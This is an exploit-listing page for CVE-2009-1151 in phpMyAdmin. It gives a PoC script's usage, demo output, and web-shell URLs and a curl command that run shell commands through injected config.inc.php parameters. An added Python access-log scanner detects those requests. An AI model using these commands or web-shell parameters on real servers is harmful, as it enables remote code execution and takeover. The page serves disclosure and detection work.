Related vulnerability
Description
phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC (CVE-2009-1151)
Introduction
# minervais.com.phpMyAdminRCE.sh
phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC. This was the first publicly released exploit for CVE-2009-1151.
## Syntax
```
$ ./phpMyAdminRCE.sh
usage: ./phpMyAdminRCE.sh <phpMyAdmin_base_URL>
i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/
```
## Demo
```
$ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();
please send any feedback/improvements for this script to unknown.pentester<AT_sign_goes_here>gmail.com
```
## Post-injection RCE:
```
$ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
drwxr-xr-x 3 root root 4096 May 6 10:01 boot
lrwxrwxrwx 1 root root 11 Oct 12 2008 cdrom -> media/cdrom
drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
drwxr-xr-x 3 root root 4096 Oct 18 2008 home
drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd
_[partial output removed for brevity reasons]_
```
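A defender-side check for the traces the demo above leaves in a web server access log, added here as an example (it is not part of the original README or script). It flags requests to `scripts/setup.php` and requests to `config/config.inc.php`, in particular those carrying the `c` or `p` parameter shown in the demo URLs. The function names, labels and log lines are constructed for illustration, and Combined Log Format is assumed.

```python
import re
from urllib.parse import parse_qs, unquote

# Combined Log Format prefix: host ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(method, target):
    """Return a finding label for one request line, or None if unremarkable."""
    raw_path, _, query = target.partition("?")
    # Collapse repeated slashes: the demo URLs contain "//config/".
    path = re.sub(r"/{2,}", "/", unquote(raw_path)).lower()
    if path.endswith("/scripts/setup.php"):
        # The setup script is the entry point named in the advisory title.
        return "setup-post" if method == "POST" else "setup-access"
    if path.endswith("/config/config.inc.php"):
        params = parse_qs(query, keep_blank_values=True)
        # "c" and "p" are the parameters used in the post-injection URLs above.
        if "c" in params or "p" in params:
            return "config-exec"
        return "config-direct"  # a config file should not be requested directly
    return None

def scan(lines):
    """Return (label, client, time, status, target) for every flagged line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host, when, method, target, status = m.groups()
        label = classify(method.upper(), target)
        if label:
            findings.append((label, host, when, int(status), target))
    return findings

# Constructed sample log lines (documentation-range client addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Jun/2009:09:10:01 +0000] "GET /phpMyAdmin-3.0.1.1/scripts/setup.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Jun/2009:09:10:02 +0000] "POST /phpMyAdmin-3.0.1.1/scripts/setup.php HTTP/1.1" 200 4811',
    '198.51.100.7 - - [05/Jun/2009:09:10:05 +0000] "GET /phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/ HTTP/1.1" 200 913',
    '203.0.113.20 - - [05/Jun/2009:09:11:40 +0000] "GET /phpMyAdmin-3.0.1.1/index.php?db=test HTTP/1.1" 200 7002',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

A `config-exec` hit with a 200 status means the written `config.inc.php` is being served and invoked, so the file under `config/` should be inspected and the `scripts/` and `config/` directories removed or blocked.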
File snapshot
[4.0K] /data/pocs/c3edf78c7c8dbeaa757733bf0ec8bc201f7ce938
├── [ 34K] calc.xls
├── [4.2K] minervais.com.phpMyAdminRCE.sh
└── [1.5K] README.md
0 directories, 3 files